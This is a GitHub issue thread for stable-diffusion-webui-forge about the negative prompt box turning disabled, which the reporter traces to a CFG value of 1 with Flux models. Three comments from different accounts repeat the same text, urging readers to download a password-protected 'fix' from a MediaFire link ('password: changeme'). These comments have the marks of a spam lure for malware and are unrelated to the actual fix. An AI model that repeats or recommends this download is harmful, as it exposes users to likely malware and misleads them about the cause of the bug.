### ISSUE TITLE
[Bug]: Negative Prompt Text Area is disabled

### ISSUE THREAD

**Issue by cpaulwk** [lllyasviel/stable-diffusion-webui-forge#1524]
### Checklist:
- The issue exists after disabling all extensions
- The issue has not been reported before recently

### What happened?
OS: Windows 11
Web Browser: Arc

The negative prompt text area is disabled by default, so I can't type in it. After checking using Inspect Element Tool, there's an additional attribute 'disabled' added to the <text area> element.

![UI](https://github.com/user-attachments/assets/0e2871ca-c4fd-4625-829d-f2a336b3114b)
![UI 2](https://github.com/user-attachments/assets/44ac9f99-ba88-4598-97b7-f974663b23f1)

### Steps to reproduce the problem:
1. Launch the server
2. The negative prompt text area appears to be enabled
3. After a fraction of a second, the negative prompt text area is disabled

### What should have happened?
The text area for the negative prompt should be enabled by default, and I should be able to type in it.

### Sysinfo
[sysinfo-2024-08-26-17-55.json](https://github.com/user-attachments/files/16752063/sysinfo-2024-08-26-17-55.json)

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by cpaulwk** [comment]
Yes indeed, it works actually works when I increase the cfg value above 1.

Thank you for mentioning that Flux is a special case, I will keep the cfg at 1 for flux.

**Comment by remixer-dec** [comment]
There are at least 3 CFG sliders in forge, regular CFG, distilled CFG and dynamic threshold with a few more sliders inside it. It is very confusing, which one works with flux as a negative prompt?
